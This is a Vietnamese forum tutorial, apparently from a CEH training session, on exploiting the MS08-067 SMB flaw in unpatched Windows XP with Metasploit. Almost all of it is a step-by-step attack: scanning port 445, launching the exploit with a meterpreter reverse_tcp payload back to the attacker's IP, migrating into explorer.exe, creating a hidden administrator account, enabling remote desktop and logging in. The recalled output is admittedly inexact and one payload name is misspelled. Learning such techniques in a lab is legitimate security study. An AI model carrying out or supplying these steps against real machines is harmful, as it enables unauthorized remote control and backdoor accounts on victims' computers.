[TUT] Khai thác và remote desktop window XP qua ms08_067_netapi

[TUT] Khai thác và remote desktop window XP qua ms08_067_netapi
Thử làm một cái tut về metasploit :) Do mình vẫn đang học nên có gì sai sót anh em PM để mình chỉnh lại nha :)
Đầu tiên, target phải chạy window XP và không cập nhật bản vá nào cho lỗi trên (có thể khai thác thử, nếu không được có khả năng là đã cập nhật).
Các bước làm như sau (em ghét quay video lắm) với giả sử mục tiêu là nội bộ trong mạng:
Attacker IP: 192.168.1.112 (OS: Kali/Backtrack)
Victim IP: 192.168.1.128 (OS: WIndowXP, port 445 open)
Bước 1: Scan để kiểm tra mục tiêu (TERMINAL 1)
root@bt ~> nmap 192.168.1.128 -p 445
Nếu thấy là 445 open Microsoft -ds gì đó là ngon rồi :)….
Bước 2: Khai thác (TERMINAL 2) – chữ xanh là giải thích nha
msfconsole (vào công cụ metasploit)
msf> use windows/smb/ms08_067_netapi   (dùng exploit ms08_067_netapi)
msf(ms08_067_netapi) > set RHOST 192.168.1.128 (cái này là IP của victim)
msf(ms08_067_netapi) > set LHOST 192.168.1.112  (cái này là IP của mình, sử dụng ifconfig để biết nha)
msf(ms08_067_netapi) > set PAYLOAD windows/meterpreter/revese_tcp (cái này có thể xem là một con trojan vì nó sẽ mở cửa máy victim và connect với mình)
msf(ms08_067_netapi) > exploit (sau khi set xong các tùy chọn thì giờ thực hiện khai thác)
(Mấy cái thông báo là quá trình khai thác thôi, mình tự nhớ lại nên không chính xác lắm nha)
[*] Started reverse handler on 192.168.1.112:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 192.168.1.128
[*] Meterpreter session 1 opened (192.168.1.112:4444 -> 192.168.1.128:1472)
(Khi xuất hiện được meterpreter> là khai thác thành công :D )
meterpreter> ps (Liệt kê danh sách process…ở đây mình chỉ quan tâm tới process nào được thực thi dưới quyền Administrator để “di trú” sang đó)
147 1 explorer.exe windows/Administrator
meterpreter> migrate 147 (Di trú sang process explorer.exe…Muốn thấy được sự khác nhau thì hãy sử dụng lên getuid trước và sau lệnh này nhé :P )
migration successfully
meterpreter> net user rain sos /add (Tạo user rain với password sos, chú ý, chỉ có thể tạo khi di trú sang process có quyền Administrator hoặc con reverse_tcp đang chạy dưới quyền Administrator)
Command completed successfully!
meterpreter> net localgroup administrators rain /add (Thêm vào group administrators thôi)
Command completed successfully!
meterpreter> run getgui -e (Enable remote desktop)
Tới đây là coi như ngon rồi đấy, giờ chỉ remote vào xem thôi ^_^
Bước 3: Remote Desktop (TERMINAL 1 đi, nãy chạy nmap đó)
root@bt ~> rdesktop 192.168.1.128 (IP của victim nha)
Xong nhập username/password: rain/sos :)
Xin cám ơn! Nếu được nhiệt liệt hưởng ứng, chúng ta có thể cùng học metasploit :)
Note: bài viết được viết theo trí nhớ của hôm offline CEH-Việt :) Có gì thắc mắc cứ vào ceh.vn nha :)
Hãy gửi bài bạn cảm thấy hay về email: jo3ght@gmail.com

Share:

0 nhận xét